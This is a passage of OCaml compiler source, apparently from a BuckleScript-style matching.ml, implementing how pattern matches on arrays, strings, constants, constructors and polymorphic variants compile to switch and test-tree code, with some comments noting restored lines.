| {pat_desc=Tpat_array patl} -> patl@rem
| _ -> assert false

let matcher_array len p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_array args when List.length args=len -> args @ rem
| Tpat_any -> Parmatch.omegas len @ rem
| _ -> raise NoMatch

(* Sub-matching for arrays of length [len]: one unsafe read per
   element (the length has already been tested at this point). *)
let make_array_matching p def ctx = function
  | [] -> fatal_error "Matching.make_array_matching"
  | ((arg, _mut) :: argl) ->
      let len = get_key_array p in
      let rec make_args pos =
        if pos >= len
        then argl
        else (Lprim(Parrayrefu ,
                    [arg; Lconst(Const_base(Const_int pos))],
                    p.pat_loc),
              StrictOpt) :: make_args (pos + 1) in
      let def = make_default (matcher_array len) def
      and ctx = filter_ctx p ctx in
      {pm={cases = []; args = make_args 0 ; default = def} ;
       ctx=ctx ;
       pat = normalize_pat p}

let divide_array ctx pm =
  divide
    make_array_matching
    (=) get_key_array get_args_array ctx pm
(*
  Specific string test sequence
  Will be called by the bytecode compiler, from bytegen.ml.
  The strategy is first dichotomic search (we perform 3-way tests
  with compare_string), then sequence of equality tests
  when there are less then T=strings_test_threshold static strings to match.

  Increasing T entails (slightly) less code, decreasing T
  (slightly) favors runtime speed.
  T=8 looks a decent tradeoff.
*)
(* Utilities *)
(* Below this many strings, use a plain sequence of equality tests. *)
let strings_test_threshold = 8

(* External primitive used to test two strings for inequality. *)
let prim_string_notequal =
  Pccall(Primitive.simple
           ~name:"caml_string_notequal"
           ~arity:2
           ~alloc:false)

(* External primitive: 3-way string comparison. *)
let prim_string_compare =
  Pccall(Primitive.simple
           ~name:"caml_string_compare"
           ~arity:2
           ~alloc:false)

(* Bind [arg] to a fresh variable unless it already is one, so that it
   is evaluated exactly once by the switch code built by [k]. *)
let bind_sw arg k = match arg with
  | Lvar _ -> k arg
  | _ ->
      let id = Ident.create "switch" in
      Llet (Strict,Pgenval,id,arg,k (Lvar id))
(* Linear sequence of string-equality tests.  When no default action is
   given, the last case acts as the default. *)
let make_string_test_sequence loc arg sw d =
  let d,sw = match d with
    | None ->
        begin match sw with
          | (_,d)::sw -> d,sw
          | [] -> assert false
        end
    | Some d -> d,sw in
  bind_sw arg
    (fun arg ->
       List.fold_right
         (fun (s,lam) k ->
            Lifthenelse
              (Lprim
                 (prim_string_notequal,
                  [arg; Lconst (Const_immstring s)], loc),
               k,lam))
         sw d)
(* [split k xs] cuts [xs] (whose length is [k]) around a pivot element
   sitting roughly in the middle, returning (prefix, pivot, suffix).
   The empty list is an invariant violation. *)
let rec split k xs = match xs with
  | [] -> assert false
  | hd :: tl ->
      if k <= 1 then ([], hd, tl)
      else
        let before, pivot, after = split (k - 2) tl in
        (hd :: before, pivot, after)
(* The integer constant 0, pivot for 3-way comparison results. *)
let zero_lam = Lconst (Const_base (Const_int 0))

(* Dispatch on the sign of [arg]: negative -> lt, zero -> eq,
   positive -> gt. *)
let tree_way_test loc arg lt eq gt =
  Lifthenelse
    (Lprim (Pintcomp Clt,[arg;zero_lam], loc),lt,
     Lifthenelse(Lprim (Pintcomp Clt,[zero_lam;arg], loc),gt,eq))
(* Dichotomic search over the sorted static strings; below the threshold
   fall back to the linear test sequence.  [delta] accounts for the
   presence of a default action. *)
let rec do_make_string_test_tree loc arg sw delta d =
  let len = List.length sw in
  if len <= strings_test_threshold+delta then
    make_string_test_sequence loc arg sw d
  else
    let lt,(s,act),gt = split len sw in
    bind_sw
      (Lprim
         (prim_string_compare,
          [arg; Lconst (Const_immstring s)], loc))
      (fun r ->
         tree_way_test loc r
           (do_make_string_test_tree loc arg lt delta d)
           act
           (do_make_string_test_tree loc arg gt delta d))

(* Entry point: expand a string switch into a comparison tree; a supplied
   default is shared through a static catch. *)
let expand_stringswitch loc arg sw d = match d with
  | None ->
      bind_sw arg
        (fun arg -> do_make_string_test_tree loc arg sw 0 None)
  | Some e ->
      bind_sw arg
        (fun arg ->
           make_catch e
             (fun d -> do_make_string_test_tree loc arg sw 1 (Some d)))
(* Generic test trees *)

(* Sharing *)
(* Returns a reference to a wrapper installing the delayed static catches
   created so far, plus a function mapping a Switch action to a lambda
   (shared actions become exits to a fresh catch). *)
let handle_shared () =
  let hs = ref (fun x -> x) in
  let handle_shared act = match act with
    | Switch.Single act -> act
    | Switch.Shared act ->
        let i,h = make_catch_delayed act in
        let ohs = !hs in
        hs := (fun act -> h (ohs act)) ;
        make_exit i in
  hs,handle_shared

(* Share identical actions among test-tree cases and the default action;
   returns the catch-installing wrapper, rewritten cases and default. *)
let share_actions_tree sw d =
  let store = StoreExp.mk_store () in
  let d =
    match d with
    | None -> None
    | Some d -> Some (store.Switch.act_store_shared d) in
  let sw =
    List.map (fun (cst,act) -> cst,store.Switch.act_store act) sw in
  let acts = store.Switch.act_get_shared () in
  let hs,handle_shared = handle_shared () in
  let acts = Array.map handle_shared acts in
  let d = match d with
    | None -> None
    | Some d -> Some (acts.(d)) in
  let sw = List.map (fun (cst,j) -> cst,acts.(j)) sw in
  !hs,sw,d
(* Drop duplicate constants (keeping the first action) from a list
   already sorted by constant. *)
let rec uniq_lambda_list sw = match sw with
  | []|[_] -> sw
  | (c1,_ as p1)::((c2,_)::sw2 as sw1) ->
      if const_compare c1 c2 = 0 then uniq_lambda_list (p1::sw2)
      else p1::uniq_lambda_list sw1

(* Stable-sort constant cases, then de-duplicate. *)
let sort_lambda_list l =
  let l =
    List.stable_sort (fun (x,_) (y,_) -> const_compare x y) l in
  uniq_lambda_list l
(* [cut n l] splits [l] into its first [n] elements and the remainder.
   Raises [Invalid_argument "cut"] when [l] has fewer than [n] elements. *)
let rec cut n l =
  if n = 0 then ([], l)
  else
    match l with
    | [] -> raise (Invalid_argument "cut")
    | x :: rest ->
        let taken, dropped = cut (n - 1) rest in
        (x :: taken, dropped)
(* Linear sequence of tests ending on the failure action. *)
let rec do_tests_fail loc fail tst arg = function
  | [] -> fail
  | (c, act)::rem ->
      Lifthenelse
        (Lprim (tst, [arg ; Lconst (Const_base c)], loc),
         do_tests_fail loc fail tst arg rem,
         act)

(* Linear sequence when matching cannot fail: the last action is taken
   without testing. *)
let rec do_tests_nofail loc tst arg = function
  | [] -> fatal_error "Matching.do_tests_nofail"
  | [_,act] -> act
  | (c,act)::rem ->
      Lifthenelse
        (Lprim (tst, [arg ; Lconst (Const_base c)], loc),
         do_tests_nofail loc tst arg rem,
         act)

(* Dichotomic test tree over sorted constants with action sharing.
   [tst] is the inequality test; [lt_tst] the strict-order test used for
   splitting (Pignore disables splitting). *)
let make_test_sequence loc fail tst lt_tst arg const_lambda_list =
  let const_lambda_list = sort_lambda_list const_lambda_list in
  let hs,const_lambda_list,fail =
    share_actions_tree const_lambda_list fail in
  let rec make_test_sequence const_lambda_list =
    if List.length const_lambda_list >= 4 && lt_tst <> Pignore then
      split_sequence const_lambda_list
    else match fail with
      | None -> do_tests_nofail loc tst arg const_lambda_list
      | Some fail -> do_tests_fail loc fail tst arg const_lambda_list
  and split_sequence const_lambda_list =
    let list1, list2 =
      cut (List.length const_lambda_list / 2) const_lambda_list in
    Lifthenelse(Lprim(lt_tst,
                      [arg; Lconst(Const_base (fst(List.hd list2)))],
                      loc),
                make_test_sequence list1, make_test_sequence list2)
  in
  hs (make_test_sequence const_lambda_list)
(* Adapter module instantiating the generic switch compiler (Switch.Make)
   with Lambda-level integer tests, offsets, switches and catches. *)
module SArg = struct
  type primitive = Lambda.primitive

  let eqint = Pintcomp Ceq
  let neint = Pintcomp Cneq
  let leint = Pintcomp Cle
  let ltint = Pintcomp Clt
  let geint = Pintcomp Cge
  let gtint = Pintcomp Cgt

  type act = Lambda.lambda

  let make_prim p args = Lprim (p,args,Location.none)
  (* [arg + n]; emits no code when n = 0 *)
  let make_offset arg n = match n with
    | 0 -> arg
    | _ -> Lprim (Poffsetint n,[arg],Location.none)

  (* Alias-bind [arg] unless it already is a variable. *)
  let bind arg body =
    let newvar,newarg = match arg with
      | Lvar v -> v,arg
      | _ ->
          let newvar = Ident.create "switcher" in
          newvar,Lvar newvar in
    bind Alias newvar arg (body newarg)
  let make_const i = Lconst (Const_base (Const_int i))
  let make_isout h arg = Lprim (Pisout, [h ; arg],Location.none)
  let make_isin h arg = Lprim (Pnot,[make_isout h arg],Location.none)
  let make_if cond ifso ifnot = Lifthenelse (cond, ifso, ifnot)
  (* Dense constant switch over [cases], keys shifted by [offset]. *)
  let make_switch loc arg cases acts ~offset sw_names =
    let l = ref [] in
    for i = Array.length cases-1 downto 0 do
      l := (offset + i,acts.(cases.(i))) :: !l
    done ;
    Lswitch(arg,
            {sw_numconsts = Array.length cases ; sw_consts = !l ;
             sw_numblocks = 0 ; sw_blocks = [] ;
             sw_failaction = None;
             sw_names}, loc)
  let make_catch = make_catch_delayed
  let make_exit = make_exit
end
(* Action sharing for Lswitch argument *)
(* Share identical actions among the cases of an Lswitch via static
   catches; returns the catch-installing wrapper and the rewritten switch. *)
let share_actions_sw sw =
  let store = StoreExp.mk_store () in
  let fail = match sw.sw_failaction with
    | None -> None
    | Some fail ->
        Some (store.Switch.act_store_shared fail) in
  let consts =
    List.map
      (fun (i,e) -> i,store.Switch.act_store e)
      sw.sw_consts
  and blocks =
    List.map
      (fun (i,e) -> i,store.Switch.act_store e)
      sw.sw_blocks in
  let acts = store.Switch.act_get_shared () in
  let hs,handle_shared = handle_shared () in
  let acts = Array.map handle_shared acts in
  let fail = match fail with
    | None -> None
    | Some fail -> Some (acts.(fail)) in
  !hs,
  { sw with
    sw_consts = List.map (fun (i,j) -> i,acts.(j)) consts ;
    sw_blocks = List.map (fun (i,j) -> i,acts.(j)) blocks ;
    sw_failaction = fail; }

(* If some exit is the action of at least 3 cases, make it the switch
   default action and drop the corresponding cases. *)
let reintroduce_fail sw = match sw.sw_failaction with
  | None ->
      let t = Hashtbl.create 17 in
      let seen (_,l) = match as_simple_exit l with
        | Some i ->
            let old = try Hashtbl.find t i with Not_found -> 0 in
            Hashtbl.replace t i (old+1)
        | None -> () in
      List.iter seen sw.sw_consts ;
      List.iter seen sw.sw_blocks ;
      let i_max = ref (-1)
      and max = ref (-1) in
      Hashtbl.iter
        (fun i c ->
           if c > !max then begin
             i_max := i ;
             max := c
           end) t ;
      if !max >= 3 then
        let default = !i_max in
        let remove ls =
          Ext_list.filter ls
            (fun (_,lam) -> match as_simple_exit lam with
               | Some j -> j <> default
               | None -> true) in
        {sw with
         sw_consts = remove sw.sw_consts ;
         sw_blocks = remove sw.sw_blocks ;
         sw_failaction = Some (make_exit default)}
      else sw
  | Some _ -> sw
(* Instantiate the generic switch compiler and open its types. *)
module Switcher = Switch.Make(SArg)
open Switch
(* First component of the last pair of the list, or [def] when empty. *)
let last def pairs =
  List.fold_left (fun _ (key, _) -> key) def pairs
(* Lowest and highest keys covered by [l] (its first and last keys),
   falling back to [low]/[high] when [l] is empty. *)
let get_edges low high l =
  match l with
  | [] -> (low, high)
  | (first, _) :: rest ->
      let hi = List.fold_left (fun _ (key, _) -> key) first rest in
      (first, hi)
(* Turn sorted (key, action) cases into an array of intervals
   (low, high, action-index); action index 0 is the failure action.
   Fix: the statement storing [fail] first (so that it receives index 0)
   had been lost together with its trailing comment; it is restored
   below — without it the asserts on index 0 would be meaningless. *)
let as_interval_canfail fail low high l =
  let store = StoreExp.mk_store () in
  let do_store _tag act =
    let i = store.act_store act in
    (*
    eprintf "STORE [%s] %i %s\n" tag i (string_of_lam act) ;
    *)
    i in
  (* Scan runs whose current action is not the failure action. *)
  let rec nofail_rec cur_low cur_high cur_act = function
    | [] ->
        if cur_high = high then
          [cur_low,cur_high,cur_act]
        else
          [(cur_low,cur_high,cur_act) ; (cur_high+1,high, 0)]
    | ((i,act_i)::rem) as all ->
        let act_index = do_store "NO" act_i in
        if cur_high+1= i then
          if act_index=cur_act then
            nofail_rec cur_low i cur_act rem
          else if act_index=0 then
            (cur_low,i-1, cur_act)::fail_rec i i rem
          else
            (cur_low, i-1, cur_act)::nofail_rec i i act_index rem
        else if act_index = 0 then
          (cur_low, cur_high, cur_act)::
          fail_rec (cur_high+1) (cur_high+1) all
        else
          (cur_low, cur_high, cur_act)::
          (cur_high+1,i-1,0)::
          nofail_rec i i act_index rem
  (* Scan runs whose current action is the failure action (index 0). *)
  and fail_rec cur_low cur_high = function
    | [] -> [(cur_low, cur_high, 0)]
    | (i,act_i)::rem ->
        let index = do_store "YES" act_i in
        if index=0 then fail_rec cur_low i rem
        else
          (cur_low,i-1,0)::
          nofail_rec i i index rem in
  let init_rec = function
    | [] -> [low,high,0]
    | (i,act_i)::rem ->
        let index = do_store "INIT" act_i in
        if index=0 then
          fail_rec low i rem
        else
          if low < i then
            (low,i-1,0)::nofail_rec i i index rem
          else
            nofail_rec i i index rem in
  ignore (do_store "FAIL" fail) ; (* fail has action index 0 *)
  let r = init_rec l in
  Array.of_list r, store
(* Interval construction when matching cannot fail: the first action
   gets index 0, stored shared when the key range has holes. *)
let as_interval_nofail l =
  let store = StoreExp.mk_store () in
  let rec some_hole = function
    | []|[_] -> false
    | (i,_)::((j,_)::_ as rem) ->
        j > i+1 || some_hole rem in
  let rec i_rec cur_low cur_high cur_act = function
    | [] ->
        [cur_low, cur_high, cur_act]
    | (i,act)::rem ->
        let act_index = store.act_store act in
        if act_index = cur_act then
          i_rec cur_low i cur_act rem
        else
          (cur_low, cur_high, cur_act)::
          i_rec i i act_index rem in
  let inters = match l with
    | (i,act)::rem ->
        let act_index =
          if some_hole rem then
            store.act_store_shared act
          else
            store.act_store act in
        assert (act_index = 0) ;
        i_rec i i act_index rem
    | _ -> assert false in
  Array.of_list inters, store
(* Sort (key, action) pairs by ascending key. *)
let sort_int_lambda_list pairs =
  List.sort (fun (k1, _) (k2, _) -> compare k1 k2) pairs
(* Build the interval representation consumed by the switch compiler. *)
let as_interval fail low high l =
  let l = sort_int_lambda_list l in
  get_edges low high l,
  (match fail with
   | None -> as_interval_nofail l
   | Some act -> as_interval_canfail act low high l)

(* Compile integer cases through the generic switch compiler. *)
let call_switcher loc fail arg low high int_lambda_list sw_names =
  let edges, (cases, actions) =
    as_interval fail low high int_lambda_list in
  Switcher.zyva loc edges arg cases actions sw_names
(* Or-pattern collecting all patterns of a non-empty list. *)
let rec list_as_pat = function
  | [] -> fatal_error "Matching.list_as_pat"
  | [pat] -> pat
  | pat::rem ->
      {pat with pat_desc = Tpat_or (pat,list_as_pat rem,None)}

(* Patterns for the constructors of the type not present in [pats]. *)
let complete_pats_constrs = function
  | p::_ as pats ->
      List.map
        (pat_of_constr p)
        (complete_constrs p (List.map get_key_constr pats))
  | _ -> assert false
(*
  Following two ``failaction'' functions compute n, the trap handler
  to jump to in case of failure of elementary tests
*)
(* Failure action for partial matches: jump to the innermost default
   handler, if any; total matches need no failure action. *)
let mk_failaction_neg partial ctx def = match partial with
  | Partial ->
      begin match def with
        | (_,idef)::_ ->
            Some (Lstaticraise (idef,[])),jumps_singleton idef ctx
        | [] ->
            None, jumps_empty
      end
  | Total ->
      None, jumps_empty
(* Positive failure actions: compute explicit (constructor -> jump) cases
   for the constructors not matched here, dispatching each to the first
   default handler whose matrix it matches.  Falls back to the negative
   scheme when too many constructors are missing.
   Fix: the `end else begin` separating the two branches had been lost
   with its trailing comment; it is restored (the final `end` requires it). *)
let mk_failaction_pos partial seen ctx defs =
  if dbg then begin
    prerr_endline "**POS**" ;
    pretty_def defs ;
    ()
  end ;
  let rec scan_def env to_test defs = match to_test,defs with
    | ([],_)|(_,[]) ->
        List.fold_left
          (fun (klist,jumps) (pats,i)->
             let action = Lstaticraise (i,[]) in
             let klist =
               List.fold_right
                 (fun pat r -> (get_key_constr pat,action)::r)
                 pats klist
             and jumps =
               jumps_add i (ctx_lub (list_as_pat pats) ctx) jumps in
             klist,jumps)
          ([],jumps_empty) env
    | _,(pss,idef)::rem ->
        let now, later =
          List.partition
            (fun (_p,p_ctx) -> ctx_match p_ctx pss) to_test in
        match now with
        | [] -> scan_def env to_test rem
        | _ -> scan_def ((List.map fst now,idef)::env) later rem in

  let fail_pats = complete_pats_constrs seen in
  if List.length fail_pats < 32 then begin
    let fail,jmps =
      scan_def
        []
        (List.map
           (fun pat -> pat, ctx_lub pat ctx)
           fail_pats)
        defs in
    if dbg then begin
      eprintf "POSITIVE JUMPS [%i]:\n" (List.length fail_pats);
      pretty_jumps jmps
    end ;
    None,fail,jmps
  end else begin (* Too many non-matched constructors -> reduced information *)
    if dbg then eprintf "POS->NEG!!!\n%!" ;
    let fail,jumps = mk_failaction_neg partial ctx defs in
    if dbg then
      eprintf "FAIL: %s\n"
        (match fail with
         | None -> "<none>"
         | Some lam -> string_of_lam lam) ;
    fail,[],jumps
  end
(* Compile dispatch on constant patterns, by constant kind: ints and
   chars through a switcher, strings through a string switch, boxed
   numbers through comparison test trees. *)
let combine_constant names loc arg cst partial ctx def
    (const_lambda_list, total, _pats) =
  let fail, local_jumps =
    mk_failaction_neg partial ctx def in
  let lambda1 =
    match cst with
    | Const_int _ ->
        let int_lambda_list =
          List.map (function Const_int n, l -> n,l | _ -> assert false)
            const_lambda_list in
        call_switcher loc fail arg min_int max_int int_lambda_list names
    | Const_char _ ->
        let int_lambda_list =
          List.map (function Const_char c, l -> (c, l)
                           | _ -> assert false)
            const_lambda_list in
        call_switcher loc fail arg 0 max_int int_lambda_list names
    | Const_string _ ->
        let const_lambda_list = sort_lambda_list const_lambda_list in
        let sw =
          List.map
            (fun (c,act) -> match c with
               | Const_string (s,_) -> s,act
               | _ -> assert false)
            const_lambda_list in
        let hs,sw,fail = share_actions_tree sw fail in
        hs (Lstringswitch (arg,sw,fail,loc))
    | Const_float _ ->
        make_test_sequence loc
          fail
          (Pfloatcomp Cneq) (Pfloatcomp Clt)
          arg const_lambda_list
    | Const_int32 _ ->
        make_test_sequence loc
          fail
          (Pbintcomp(Pint32, Cneq)) (Pbintcomp(Pint32, Clt))
          arg const_lambda_list
    | Const_int64 _ ->
        make_test_sequence loc
          fail
          (Pbintcomp(Pint64, Cneq)) (Pbintcomp(Pint64, Clt))
          arg const_lambda_list
    | Const_nativeint _ ->
        make_test_sequence loc
          fail
          (Pbintcomp(Pnativeint, Cneq)) (Pbintcomp(Pnativeint, Clt))
          arg const_lambda_list
  in lambda1,jumps_union local_jumps total
(* Partition constructor cases into constant and block constructors,
   each list sorted by tag. *)
let split_cases tag_lambda_list =
  let rec split_rec = function
      [] -> ([], [])
    | (cstr, act) :: rem ->
        let (consts, nonconsts) = split_rec rem in
        match cstr with
          Cstr_constant n -> ((n, act) :: consts, nonconsts)
        | Cstr_block n -> (consts, (n, act) :: nonconsts)
        | Cstr_unboxed -> (consts, (0, act) :: nonconsts)
        | Cstr_extension _ -> assert false in
  let const, nonconst = split_rec tag_lambda_list in
  sort_int_lambda_list const,
  sort_int_lambda_list nonconst

(* Same partition for polymorphic variant cases; actions keep the tag name. *)
let split_variant_cases tag_lambda_list =
  let rec split_rec = function
      [] -> ([], [])
    | ((name,cstr), act) :: rem ->
        let (consts, nonconsts) = split_rec rem in
        match cstr with
          Cstr_constant n -> ((n, (name, act)) :: consts, nonconsts)
        | Cstr_block n -> (consts, (n, (name, act)) :: nonconsts)
        | Cstr_unboxed -> assert false
        | Cstr_extension _ -> assert false in
  let const, nonconst = split_rec tag_lambda_list in
  sort_int_lambda_list const,
  sort_int_lambda_list nonconst

(* Partition extension-constructor cases into constant / block ones. *)
let split_extension_cases tag_lambda_list =
  let rec split_rec = function
      [] -> ([], [])
    | (cstr, act) :: rem ->
        let (consts, nonconsts) = split_rec rem in
        match cstr with
          Cstr_extension(path, true) when not !Config.bs_only -> ((path, act) :: consts, nonconsts)
        | Cstr_extension(path, _) -> (consts, (path, act) :: nonconsts)
        | _ -> assert false in
  split_rec tag_lambda_list

(* Primitive comparing extension-constructor slots. *)
let extension_slot_eq =
  Pccall (Primitive.simple ~name:"#extension_slot_eq" ~arity:2 ~alloc:false)
(* Compile dispatch on datatype constructors.  Extension constructors
   (cstr_consts < 0) are compared by slot; ordinary constructors compile
   to an integer/tag switch.
   Fix: two match arms that had been lost together with their trailing
   comments are restored: the shared-action shortcut
   `| None,Some act -> act` and the constant-constructors-only case
   `| (n,0,_,[]) ->` heading the orphaned call_switcher line. *)
let combine_constructor sw_names loc arg ex_pat cstr partial ctx def
    (tag_lambda_list, total1, pats) =
  if cstr.cstr_consts < 0 then begin
    (* Extension constructors: sequence of slot-equality tests. *)
    let fail, local_jumps =
      mk_failaction_neg partial ctx def in
    let lambda1 =
      let consts, nonconsts = split_extension_cases tag_lambda_list in
      let default, consts, nonconsts =
        match fail with
        | None ->
            begin match consts, nonconsts with
              | _, (_, act)::rem -> act, consts, rem
              | (_, act)::rem, _ -> act, rem, nonconsts
              | _ -> assert false
            end
        | Some fail -> fail, consts, nonconsts in
      let nonconst_lambda =
        match nonconsts with
          [] -> default
        | _ ->
            let tag = Ident.create "tag" in
            let tests =
              List.fold_right
                (fun (path, act) rem ->
                   let ext = transl_extension_path ex_pat.pat_env path in
                   Lifthenelse(Lprim(extension_slot_eq , [Lvar tag; ext], loc),
                               act, rem))
                nonconsts
                default
            in
            Llet(Alias, Pgenval,tag, arg, tests)
      in
      List.fold_right
        (fun (path, act) rem ->
           let ext = transl_extension_path ex_pat.pat_env path in
           Lifthenelse(Lprim(extension_slot_eq , [arg; ext], loc),
                       act, rem))
        consts
        nonconst_lambda
    in
    lambda1, jumps_union local_jumps total1
  end else begin
    (* Ordinary constructors. *)
    let ncases = List.length tag_lambda_list
    and nconstrs = cstr.cstr_consts + cstr.cstr_nonconsts in
    let sig_complete = ncases = nconstrs in
    let fail_opt,fails,local_jumps =
      if sig_complete then None,[],jumps_empty
      else
        mk_failaction_pos partial pats ctx def in
    let tag_lambda_list = fails @ tag_lambda_list in
    let (consts, nonconsts) = split_cases tag_lambda_list in
    let lambda1 =
      match fail_opt,same_actions tag_lambda_list with
      | None,Some act -> act (* Identical actions, no failure *)
      | _ ->
          match
            (cstr.cstr_consts, cstr.cstr_nonconsts, consts, nonconsts)
          with
          | (1, 1, [0, act1], [0, act2]) ->
              let arg =
                if !Config.bs_only && Datarepr.constructor_has_optional_shape cstr then
                  Lprim(is_not_none_bs_primitve , [arg], loc)
                else arg
              in
              Lifthenelse(arg, act2, act1)
          | (2,0, [(i1,act1); (_,act2)],[]) ->
              if i1 = 0 then Lifthenelse(arg, act2, act1)
              else Lifthenelse (arg,act1,act2)
          | (n,0,_,[]) -> (* The type defines constant constructors only *)
              call_switcher loc fail_opt arg 0 (n-1) consts sw_names
          | (n, _, _, _) ->
              let act0 =
                match fail_opt,nonconsts with
                | Some a,[] -> Some a
                | Some _,_ ->
                    if List.length nonconsts = cstr.cstr_nonconsts then
                      same_actions nonconsts
                    else None
                | None,_ -> same_actions nonconsts in
              match act0 with
              | Some act ->
                  Lifthenelse
                    (Lprim (Pisint, [arg], loc),
                     call_switcher loc
                       fail_opt arg
                       0 (n-1) consts sw_names,
                     act)
              | None ->
                  let sw =
                    {sw_numconsts = cstr.cstr_consts; sw_consts = consts;
                     sw_numblocks = cstr.cstr_nonconsts; sw_blocks = nonconsts;
                     sw_failaction = fail_opt;
                     sw_names} in
                  let hs,sw = share_actions_sw sw in
                  let sw = reintroduce_fail sw in
                  hs (Lswitch (arg,sw,loc)) in
    lambda1, jumps_union local_jumps total1
  end
(* Constant variant tags compiled as a test sequence over their hashes. *)
let make_test_sequence_variant_constant fail arg int_lambda_list =
  let _, (cases, actions) =
    as_interval fail min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) in
  Switcher.test_sequence arg cases actions

(* Switch on a constant variant value (the hash itself). *)
let call_switcher_variant_constant loc fail arg int_lambda_list names =
  call_switcher loc fail arg min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names

(* Switch on a non-constant variant: bind and test field 0 (the tag). *)
let call_switcher_variant_constr loc fail arg int_lambda_list names =
  let v = Ident.create "variant" in
  Llet(Alias, Pgenval, v, Lprim(Pfield (0, Fld_poly_var_tag), [arg], loc),
       call_switcher loc
         fail (Lvar v) min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names)

(* Overridable hooks: the functions above are installed as defaults and
   may be replaced by assigning these references. *)
let call_switcher_variant_constant :
  (Location.t ->
   Lambda.lambda option ->
   Lambda.lambda ->
   (int * (string * Lambda.lambda)) list ->
   Lambda.switch_names option ->
   Lambda.lambda)
    ref= ref call_switcher_variant_constant

let call_switcher_variant_constr :
  (Location.t ->
   Lambda.lambda option ->
   Lambda.lambda ->
   (int * (string * Lambda.lambda)) list ->
   Lambda.switch_names option ->
   Lambda.lambda)
    ref
  = ref call_switcher_variant_constr

let make_test_sequence_variant_constant :
  (Lambda.lambda option ->
   Lambda.lambda ->
   (int * (string * Lambda.lambda)) list ->
   Lambda.lambda)
    ref
  = ref make_test_sequence_variant_constant
(* Compile dispatch on polymorphic variant tags.
   Fix: the binding `and one_action = same_actions tag_lambda_list in`
   (and with it the `in` closing `sig_complete`) had been lost, leaving
   [one_action] unbound; also restored the `| (_, []) ->` arm heading the
   orphaned make_test_sequence_variant_constant line. *)
let combine_variant names loc row arg partial ctx def
    (tag_lambda_list, total1, _pats) =
  let row = Btype.row_repr row in
  (* Count the constructors the row can actually take. *)
  let num_constr = ref 0 in
  if row.row_closed then
    List.iter
      (fun (_, f) ->
         match Btype.row_field_repr f with
           Rabsent | Reither(true, _::_, _, _) -> ()
         | _ -> incr num_constr)
      row.row_fields
  else
    num_constr := max_int;
  let test_int_or_block arg if_int if_block =
    if !Config.bs_only then
      Lifthenelse(Lprim (Pccall(Primitive.simple ~name:"#is_poly_var_block" ~arity:1 ~alloc:false), [arg], loc), if_block, if_int)
    else
      Lifthenelse(Lprim (Pisint, [arg], loc), if_int, if_block) in
  let sig_complete = List.length tag_lambda_list = !num_constr
  and one_action = same_actions tag_lambda_list in
  let fail, local_jumps =
    if
      sig_complete || (match partial with Total -> true | _ -> false)
    then
      None, jumps_empty
    else
      mk_failaction_neg partial ctx def in
  let (consts, nonconsts) = split_variant_cases tag_lambda_list in
  let lambda1 = match fail, one_action with
    | None, Some act -> act
    | _,_ ->
        match (consts, nonconsts) with
        | ([_, (_,act1)], [_, (_,act2)]) when fail=None ->
            test_int_or_block arg act1 act2
        | (_, []) -> (* One can compare integers and pointers *)
            !make_test_sequence_variant_constant fail arg consts
        | ([], _) ->
            let lam = !call_switcher_variant_constr loc
                fail arg nonconsts names in
            begin match fail with
              | None -> lam
              | Some fail -> test_int_or_block arg fail lam
            end
        | (_, _) ->
            let lam_const =
              !call_switcher_variant_constant loc
                fail arg consts names
            and lam_nonconst =
              !call_switcher_variant_constr loc
                fail arg nonconsts names in
            test_int_or_block arg lam_const lam_nonconst
  in
  lambda1, jumps_union local_jumps total1
(* Compile dispatch on array patterns: switch on the array length. *)
let combine_array names loc arg partial ctx def
    (len_lambda_list, total1, _pats) =
  let fail, local_jumps = mk_failaction_neg partial ctx def in
  let lambda1 =
    let newvar = Ident.create "len" in
    let switch =
      call_switcher loc
        fail (Lvar newvar)
        0 max_int len_lambda_list names in
    bind
      Alias newvar (Lprim(Parraylength , [arg], loc)) switch in
  lambda1, jumps_union local_jumps total1

(* No debug-event instrumentation here: the action is returned unchanged. *)
let [@inline] event_branch _repr lam = lam
(*
  This exception is raised when the compiler cannot produce code
  because control cannot reach the compiled clause,

  Unused is raised initially in compile_test.

  compile_list (for compiling switch results) catch Unused

  comp_match_handlers (for compiling splitted matches)
  may reraise Unused
*)
(* Raised when control cannot reach a compiled clause. *)
exception Unused

(* Compile every cell of a division, skipping unreachable ones; returns
   the cases, the union of jump summaries, and the matched patterns. *)
let compile_list compile_fun division =
  let rec c_rec totals = function
    | [] -> [], jumps_unions totals, []
    | (key, cell) :: rem ->
        begin match cell.ctx with
          | [] -> c_rec totals rem
          | _ ->
              try
                let (lambda1, total1) = compile_fun cell.ctx cell.pm in
                let c_rem, total, new_pats =
                  c_rec
                    (jumps_map ctx_combine total1::totals) rem in
                ((key,lambda1)::c_rem), total, (cell.pat::new_pats)
              with
              | Unused -> c_rec totals rem
        end in
  c_rec [] division
(* Compile the handlers introduced for or-patterns, wrapping the body in
   the corresponding static catches.  A handler whose exit is raised as
   the whole body is inlined directly instead. *)
let compile_orhandlers compile_fun lambda1 total1 ctx to_catch =
  let rec do_rec r total_r = function
    | [] -> r,total_r
    | (mat,i,vars,pm)::rem ->
        begin try
          let ctx = select_columns mat ctx in
          let handler_i, total_i =
            compile_fun ctx pm in
          match raw_action r with
          | Lstaticraise (j,args) ->
              if i=j then
                List.fold_right2 (bind Alias) vars args handler_i,
                jumps_map (ctx_rshift_num (ncols mat)) total_i
              else
                do_rec r total_r rem
          | _ ->
              do_rec
                (Lstaticcatch (r,(i,vars), handler_i))
                (jumps_union
                   (jumps_remove i total_r)
                   (jumps_map (ctx_rshift_num (ncols mat)) total_i))
                rem
        with
        | Unused ->
            do_rec (Lstaticcatch (r, (i,vars), lambda_unit)) total_r rem
        end in
  do_rec lambda1 total1 to_catch
(* Generic driver for compiling one test: divide the matrix, compile
   each sub-matrix, then combine.  Raises Unused when no sub-matrix is
   reachable and there is no failure action. *)
let compile_test compile_fun partial divide combine ctx to_match =
  let division = divide ctx to_match in
  let c_div = compile_list compile_fun division in
  match c_div with
  | [],_,_ ->
      begin match mk_failaction_neg partial ctx to_match.default with
        | None,_ -> raise Unused
        | Some l,total -> l,total
      end
  | _ ->
      combine ctx to_match.default c_div
(* Conservative occurrence test: may variable [v] occur in the term?
   Answers [true] for any construct it does not analyse. *)
let rec approx_present v = function
  | Lconst _ -> false
  | Lstaticraise (_,args) ->
      List.exists (fun lam -> approx_present v lam) args
  | Lprim (_,args,_) ->
